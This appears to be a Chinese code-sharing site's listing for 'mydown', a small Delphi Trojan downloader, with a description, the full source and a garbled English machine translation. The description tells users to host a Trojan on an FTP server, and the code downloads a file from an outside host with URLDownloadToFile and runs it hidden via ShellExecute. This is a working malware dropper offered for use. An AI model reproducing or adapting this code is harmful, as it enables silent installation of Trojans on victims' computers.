文件名称:mydown

  • 所属分类:
  • 网络编程
  • 资源属性:
  • [Text]
  • 上传时间:
  • 2008-10-13
  • 文件大小:
  • 1.4kb
  • 下载次数:
  • 0次
  • 提 供 者:
  • 韩*
  • 相关连接:
  • 下载说明:
  • 别用迅雷下载,失败请重下,重下不扣分!

介绍说明--下载内容均来自于网络,请自行研究使用

执行后可以下载指定程序并执行





你先把大体积*放到一固定FTP空间上



打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:)



用工具压一下,只有10K





这样说完是不行的,说一下代码:



program wsdgsRoad



uses

URLMon,

ShellApi



var

u,l: pchar

{.$R *.res}

function DownloadFile(SourceFile, DestFile: string): Boolean

begin

GetMem(u,100)

GetMem(l,100)

u:= http://www.jm-my.com/ip2.txt //改为你要下载的网址

l:= c:/downpage.txt //改为你要存放并打开文件的路径

try

Result := UrlDownloadToFile(nil, PChar(u), PChar(l), 0, nil) = 0

except

Result := False

end

end

begin

if DownloadFile(u, l) then

begin

ShellExecute(0, PChar( open ), PChar(l),

PChar( ), nil, 0)

end

//freemem(u)

//freemem(l)

end.

先试一下。。。。 ok,



明白了吗 再见-after implementation can be downloaded designated procedures and implement your first Mass Trojans into a fixed space on the open FTP D elphi open down.dpr seen it change your build ok individual downloads : ) tool, pressure that is only 10K finish this is not enough, saying that what code : program uses URLMon wsdgsRoad, ShellApi var u, l : pchar (. $ R *. res) function DownloadFile (Sour ceFile, DestFile : string) : Boolean begin GetMem (u, 100) GetMem (l, 100) u : = http : / / www.jm-my.com/ip2.txt / / read you want to download the website l : = c : / downpage.txt / / read your document storage and open the path to try Result : = UrlDownloadToFile (nil, PChar (u), PChar (l), 0, nil) = 0 except Result : = False end if end begin DownloadFile (u, l) then begin ShellExecute (0, PChar (open)
(系统自动生成,下载前可以参看下载内容)

下载文件列表

压缩包 : 33753132mydown.rar 列表
down.dpr
自已动手做最小*.txt

相关说明

  • 本站资源为会员上传分享交流与学习,如有侵犯您的权益,请联系我们删除.
  • 本站是交换下载平台,提供交流渠道,下载内容来自于网络,除下载问题外,其它问题请自行百度更多...
  • 请直接用浏览器下载本站内容,不要使用迅雷之类的下载软件,用WinRAR最新版进行解压.
  • 如果您发现内容无法下载,请稍后再次尝试;或者到消费记录里找到下载记录反馈给我们.
  • 下载后发现下载的内容跟说明不相乎,请到消费记录里找到下载记录反馈给我们,经确认后退回积分.
  • 如下载前有疑问,可以通过点击"提供者"的名字,查看对方的联系方式,联系对方咨询.

相关评论

暂无评论内容.

发表评论

*主  题:
*内  容:
*验 证 码:

源码中国 www.ymcn.org